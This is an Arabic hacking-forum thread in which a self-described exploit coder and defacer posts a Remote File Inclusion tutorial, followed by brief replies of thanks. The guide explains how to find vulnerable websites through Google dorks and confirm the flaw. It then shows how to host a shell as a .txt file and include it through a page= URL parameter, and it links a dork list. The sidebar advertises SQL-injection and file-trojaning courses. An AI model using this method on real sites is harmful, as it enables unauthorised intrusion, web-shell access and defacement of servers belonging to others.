1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

شرح ثغره rfi

الموضوع في '[ الـثـغـرات ]' بواسطة NETJOURNAL, بتاريخ ‏12 أكتوبر 2014.

كاتب الموضوع : NETJOURNAL المشاهدات : 861 الردود : 13 ‏12 أكتوبر 2014
حالة الموضوع:
مغلق
  1. غير متصل

    NETJOURNAL
    مشرف

    عضو منذ:
    ‏18 مايو 2006
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,544
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:

    السلام عليكم و رحمه الله و بركاته
    كيف حالكم شباب انشاء الله بخير جميعا .
    حبيت اقدملكم شرح مبسط عن ثغره Remote File Inclusion ~RFI
    ++++++++++++++++++++++++++++++++++++++++++++++
    رح نتعلم الأتي :-
    # البحث عن مواقع مصابه.
    # التأكد من اصابه الموقع.
    # استغلال الثغره ( استعراض الشل ).
    +++++++++++++++++++
    [#] البحث عن مواقع مصابه ..!
    يتم البحث عبر الدوركات Google Dorks.
    سيتم ارفاق تجميعه دوركات للبحث .

    +++++++++++++++++
    [#] التأكد من اصابه الموقع ..
    بعد وضع الدورك المخصص في غوغل..نختار اي موقع ..
    بعد الدخول للموقع نلاحظ ان رابط الموقع ينتهي بـــ
    action.php?page=any thing

    بسهوله نقوم بحذف ما بعد علامه المساواه (=)
    و نضع بدله اي موقع يجي ع بالنا بهذا الشكل http://www.site.com ..مثلا
    index.php?page=http://iq-team.org
    ونلاحظ لو بقى الموقع على حاله او ظهر خطأ يعني الموقع مو مصاب ندور غيره .
    و لو أظهر لنا و حولنا ع موقع عراق تيم يبقى الموقع مصاب و الأمور تمام..

    ++++++++++++++++++++++++++++++++++++++++++++++
    [#] استغلال الثغره ّ
    كل الي نقدر نعمله حاجتين ؟
    اول نروح ع استضافه مجانيه و نشترك و نعمل دومين من نفس الموقع و رح يعطوك لوحه CPanel تدخل و ترفع شل بصيغه
    txt
    ===============
    ثانيا استخدام دوركات للبحث عن شلات مرفوعه بصيغه txt
    ===============
    الأن كل الي علينا نجيب رابط الموقع الي رفعنا عليه شل بصيغه تيكست و نعمل هكذا.

    www.target.com/index.php?page=http://www.site.com/shell.txt؟

    لازم نظيف علامه الأستــفهام (؟) بعد ?txt
    ?shell.txt
    تم استعراض الشل بنجاح .

    ++++++++++++++++++++++++
    :ُeُeِq:دمتم بود . موفقين.:ُeُeِq:
    ++++++++++++++++++++++++
    لتحميل دوركات البحث!

    RFI DORKS&shell.txt dorks




     


    جاري تحميل الصفحة...
  2. غير متصل

    Ameer Eagle V.I.P
    V • I • P

    عضو منذ:
    ‏7 يونيو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    2,777
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:

    رد: شرح ثغره rfi

    وعليكم السلام ورحة الله
    بارك الله بيك
    شرح كافي ووافي
     


  3. غير متصل

    KaDiM aL-iRaQi ExpertDeveloper
    ExpErt DeveloPer

    عضو منذ:
    ‏2 سبتمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    24
    نقاط الجائزة:

    رد: شرح ثغره rfi

    عشت خوي ربي يوفقك ً#ٌ5oًًًُ.
     


  4. غير متصل

    3mran
    rankrank
    Developer

    عضو منذ:
    ‏2 ابريل 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:

    رد: شرح ثغره rfi

    يعطيـك العافية
    بـارك الله فيـك
    جاري التقييم ان أمكن
     


  5. غير متصل

    mr.grey hat
    rank
    Developer

    عضو منذ:
    ‏7 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: شرح ثغره rfi

    بسم الله الرحمن الرحيم

    ماشاء الله عليك ي أخ iraq spy مبدع كعادتك وشرحك سهل ومبسط ومفهوم تقبل مروري أخي (:​
     


  6. غير متصل

    TeePlow
    V • I • P

    عضو منذ:
    ‏12 مارس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    10
    نقاط الجائزة:

    رد: شرح ثغره rfi

    السلام عليكم
    بارك الله فيك حبيبي شرح رائع
     


  7. غير متصل

    MJHOOL
    rank
    Developer

    عضو منذ:
    ‏6 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: شرح ثغره rfi

    الله يعطيك العافية يابطل
     


  8. غير متصل

    Mstr Yaser <span style="font-weight: bold; text-shadow: #BBBB
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏21 نوفمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:

    رد: شرح ثغره rfi

    شرح رائع يعطيك العافية
     


  9. غير متصل

    MR.CAPTCHA Expert Developer
    ExpErt DeveloPer

    عضو منذ:
    ‏30 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    الوظيفة:
    I.T Student
    الإقامة:

    رد: شرح ثغره rfi

    بارك الله بيك شرح رائع
     


  10. غير متصل

    Mokhalad HaXor
    V • I • P

    عضو منذ:
    ‏3 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2,460
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    Hacking
    الإقامة:

    رد: شرح ثغره rfi

    تسلم الايادي شرح جميل جدآ , واكثر من واضح :{11}: :{11}: :{11}:
     


الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...